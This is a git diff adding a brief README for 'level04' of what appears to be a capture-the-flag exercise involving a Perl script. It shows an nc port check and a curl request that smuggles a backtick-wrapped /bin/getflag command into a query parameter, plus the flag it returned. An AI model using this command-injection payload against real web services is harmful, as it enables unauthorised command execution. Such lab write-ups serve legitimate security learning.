diff --git a/level04/README.mdx b/level04/README.mdx new file mode 100644 index 0000000..06bb47a --- /dev/null +++ b/level04/README.mdx @@ -0,0 +1,11 @@ +# Todo: perl script problem +- understand the `.pl` +- know `2>&1` +```b +> nc -vz localhost 4747 + 👆 v: verbose - z: scan if a port is open +Connection to localhost 4747 port [tcp/*] succeeded! + +> curl localhost:4747/?x="\`/bin/getflag\`" +ne2searoevaevoem4ov4ar8ap +```